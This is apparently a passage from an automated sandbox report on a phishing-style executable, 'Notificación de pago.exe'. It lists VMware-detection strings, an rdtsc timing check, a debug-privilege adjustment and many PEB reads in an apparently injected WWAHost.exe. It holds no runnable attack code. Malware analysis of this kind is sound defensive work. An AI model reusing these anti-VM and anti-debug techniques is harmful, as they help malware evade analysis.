          Source: explorer.exe, 0000000B.00000000.323171776.00000000080ED000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000000.429366333.0000000000680000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 0000000B.00000000.340384303.000000000069D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000B.00000000.435360812.00000000062C4000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
          Source: explorer.exe, 0000000B.00000000.360151542.0000000004287000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
          Source: explorer.exe, 0000000B.00000000.323914419.000000000820E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
          Source: explorer.exe, 0000000B.00000000.323171776.00000000080ED000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000B.00000000.367419056.0000000008223000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00l
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Code function: 8_2_00408EC0 rdtsc
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A25BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03982397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03961B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03961B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A0D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A1138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03984BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03984BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03984BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0397DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A1131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0395F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0395DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03983B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03983B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0395DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A28B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0396AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0396AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03982ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03982AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0395AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0395AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03955210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03955210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03955210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03955210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03973A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03968A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03994A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03994A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A0B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A0B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A28A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039E4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03959240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03959240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03959240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03959240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0399927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A1EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03982990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0397C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039D69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0395B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0395B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0395B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039E41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03959100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03959100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03959100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03974120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03974120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03974120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03974120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03974120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0397B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0397B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0395B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0395B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0395C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03959080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039EB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039558EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0396B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0396B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0396B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0396B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03970050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03970050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A12073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A21074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03968794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039937F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0397F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A2070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A2070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03954F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03954F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A28F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0396EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0396FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039EFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039D46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039836CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03998EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A0FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03A28ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039676E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_039816E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0398A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0395C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0395C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_0395C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 14_2_03988E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A0FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A11608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0395E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03967E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0397AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A1AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0396766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_0398FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03A205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03982581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03952D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03981DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 14_2_03981DB5 mov eax, dword ptr fs:[00000030h]
